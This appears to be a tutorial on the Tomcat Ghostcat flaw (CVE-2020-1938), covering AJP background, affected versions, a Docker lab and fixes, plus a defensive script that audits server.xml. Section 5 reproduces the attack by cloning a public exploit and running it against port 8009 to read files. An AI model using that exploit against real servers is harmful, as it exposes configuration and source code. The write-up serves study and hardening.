1. Principle of vulnerability
Tomcat is a free, open-source web application server developed by the Apache open source organization to handle HTTP services. After installation, the AJP Connector is enabled by default so that other web servers can interact with Tomcat through the AJP protocol. Tomcat is a lightweight application server, commonly used in small and medium-sized systems and in situations without many concurrent users, and it is the first choice for developing and debugging JSP programs. Like web servers such as IIS, Tomcat can serve HTML pages, but it is also a Servlet and JSP container; running as an independent Servlet container is Tomcat's default mode. Tomcat's handling of static HTML is not as good as that of the Apache HTTP Server; both are free and can run as independent web servers. This vulnerability is caused by a flaw in Tomcat's AJP protocol handling: an attacker can read any file in the webapp directory by constructing specific parameters.
2. Vulnerability overview and analysis
Tomcat is a project developed by the Apache open source organization to handle HTTP services; both Tomcat and the Apache HTTP Server are free and can run as independent web servers. The Apache Tomcat server has a file inclusion vulnerability: an attacker can use it to read or include any file in any webapp directory on Tomcat, such as webapp configuration files or source code.
AJP Connector
The Apache Tomcat server connects to client programs through the Connector component, which represents the endpoint that receives requests and returns responses. That is, the Connector receives the client's request and sends the Tomcat server's response back to the client. The port we use most often, 8080, belongs to the so-called HTTP Connector, which uses the HTTP/1.1 protocol.
In the conf/server.xml file, its corresponding configuration is:
<Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443" />
The AJP Connector uses the AJP protocol (Apache JServ Protocol), a packet-oriented protocol. For performance reasons it transmits readable text in a binary format, which reduces the cost of processing HTTP requests, so it is mainly used in scenarios that require clustering and reverse proxies.
The configuration corresponding to the AJP protocol is:
<Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
The Tomcat server opens this port to the external network by default. There are two ways for web clients to access the Tomcat server:
Apache server
(1) AJP is a binary TCP transport protocol, and a browser cannot speak AJP. Instead, Apache communicates with Tomcat over AJP and then reverse-proxies it through the proxy_ajp module, converting the traffic to HTTP before exposing it to the user, so that the user can access it.
(2) The reason for this design is that, compared to the plain-text HTTP protocol, AJP has higher efficiency and performance, and many optimizations have been made to it. To a certain extent, AJP can be understood as a binary version of HTTP, widely used to speed up transmission. In practice, however, very few servers other than Apache have a module like proxy_ajp that can reverse proxy the AJP protocol, so AJP is rarely used in production environments.
3. Affected versions
Apache Tomcat 6
Tomcat 7 series < 7.0.100
Tomcat 8 series < 8.5.51
Tomcat 9 series < 9.0.31
4. Build a vulnerable environment
4.1 Ubuntu
4.2 Update package sources
4.3 Install docker
sudo apt-get update
sudo apt-get install docker
sudo apt-get install docker.io
sudo apt-get install docker-registry
sudo docker version
4.4 Install nmap
apt-get install nmap
4.5 Install Tomcat
docker search Tomcat-8.5.32
docker pull duonghuuphuc/tomcat-8.5.32
4.6 View the pulled Tomcat image
docker images
4.7 Start the image
docker run -d -p 8080:8080 -p 8009:8009 --name ghostcat duonghuuphuc/tomcat-8.5.32
docker port ghostcat
4.8 Check the IP address (here it is 192.168.86.129)
ifconfig -a
4.9 If the browser can open the Tomcat page, the environment is set up successfully
192.168.86.129:8080
5. Vulnerability reproduction
5.1 Enter the container's web root
docker exec -it ghostcat /bin/bash
cd webapps/ROOT/
5.2 Add a test file
echo 'this is CVE-2020-1938' > test.txt
ls
cat test.txt
5.3 Download the exp
exp address: https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
git clone https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
5.4 Make the exp executable
cd CNVD-2020-10487-Tomcat-Ajp-lfi/
ls
chmod +x CNVD-2020-10487-Tomcat-Ajp-lfi.py
ls
5.5 Use the exp to read the file
./CNVD-2020-10487-Tomcat-Ajp-lfi.py -p 8009 -f test.txt 192.168.86.129
The test file is read successfully.
6. Vulnerability repair and defense methods
The Apache Tomcat file inclusion vulnerability is fixed in newer versions: Apache has officially released versions 9.0.31, 8.5.51 and 7.0.100 for this purpose. Users who are temporarily unable to upgrade can apply the following measures according to their own circumstances. If the Tomcat AJP protocol is not needed, close the AJP Connector directly, or change its listening address so that it only listens on the machine's localhost; if the AJP protocol is needed, set authentication credentials through the protocol attributes for your version. The measures are as follows:
- Immediately upgrade Tomcat to version 9.0.31, 8.5.51 or 7.0.100 for repair.
- Disable or restrict the AJP protocol. Edit conf/server.xml and find the following line:
  <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
  Comment out this line (or delete it) if AJP is not needed. If AJP is needed, configure the secret to set authentication credentials for the AJP protocol, for example with a value such as YOUR_TOMCAT_AJP_SECRET (note that YOUR_TOMCAT_AJP_SECRET must be changed to a value that is highly secure and cannot be easily guessed).
- Configure access control: properly configured access control is one of the important measures for preventing this kind of vulnerability. Appropriate access control policies restrict access to sensitive files and allow only authorized users to perform the relevant operations.
- Regular monitoring and updates: regularly monitor vulnerability information and security bulletins, and apply relevant software updates and patches promptly to keep the system secure and stable.
- Strengthen server security: in addition to measures against specific vulnerabilities, the security of the entire server should also be strengthened. For example, use a firewall to restrict access to the server, enable a Web Application Firewall (WAF), configure SSL/TLS encrypted transmission, use strong passwords and change them regularly, and disable unnecessary services.
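To check the AJP hardening above across a fleet of server.xml files, the following added audit script (example code written for this page, not part of Tomcat or of the exp project) parses conf/server.xml and flags any AJP Connector that is not bound to loopback or has no shared secret. It assumes the secretRequired and secret attribute names used by Tomcat 8.5.51+/9.0.31+ (Tomcat 7.0.100 names the attribute differently) and, conservatively, treats a missing address attribute as "listens on all interfaces"; the three server.xml samples are constructed for the demonstration.

```python
"""Audit a Tomcat conf/server.xml for AJP Connectors exposed in the way
CVE-2020-1938 (Ghostcat) needs: reachable beyond loopback and without a shared secret."""
import xml.etree.ElementTree as ET

LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def audit_ajp_connectors(server_xml: str) -> list:
    """Return one finding per AJP Connector: {"port", "address", "issues"}.
    An empty "issues" list means that connector is considered hardened."""
    root = ET.fromstring(server_xml)  # comments are dropped, so a commented-out Connector is ignored
    findings = []
    for conn in root.iter("Connector"):
        if "AJP" not in conn.get("protocol", "HTTP/1.1").upper():
            continue
        # Assumption: a missing address attribute is read as "all interfaces"
        # (the pre-fix default), which is the conservative choice for an audit.
        address = conn.get("address", "0.0.0.0")
        secret_required = conn.get("secretRequired", "true").lower() == "true"
        secret = conn.get("secret", "")
        issues = []
        if address not in LOOPBACK:
            issues.append("AJP listens on %s instead of loopback only" % address)
        if not secret_required:
            issues.append("secretRequired is disabled")
        elif not secret:
            issues.append("no AJP secret configured")
        findings.append({"port": conn.get("port"), "address": address, "issues": issues})
    return findings


# Constructed sample 1: the stock connector line of a vulnerable Tomcat (all interfaces, no secret).
WEAK_SERVER_XML = """<Server><Service name="Catalina">
  <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443" />
  <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
</Service></Server>"""

# Constructed sample 2: AJP kept, but bound to loopback and protected by a shared secret.
# YOUR_TOMCAT_AJP_SECRET is a placeholder that must be replaced with a long random value.
HARDENED_SERVER_XML = """<Server><Service name="Catalina">
  <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443" />
  <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1" redirectPort="8443"
             secretRequired="true" secret="YOUR_TOMCAT_AJP_SECRET" />
</Service></Server>"""

# Constructed sample 3: AJP is not needed, so the connector is commented out.
DISABLED_SERVER_XML = """<Server><Service name="Catalina">
  <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443" />
  <!-- <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" /> -->
</Service></Server>"""

if __name__ == "__main__":
    for name, xml in [("weak", WEAK_SERVER_XML), ("hardened", HARDENED_SERVER_XML), ("disabled", DISABLED_SERVER_XML)]:
        print(name, audit_ajp_connectors(xml))
```

Running it against a real installation is a matter of passing open("conf/server.xml").read() to audit_ajp_connectors; any connector with a non-empty issues list needs one of the fixes listed above.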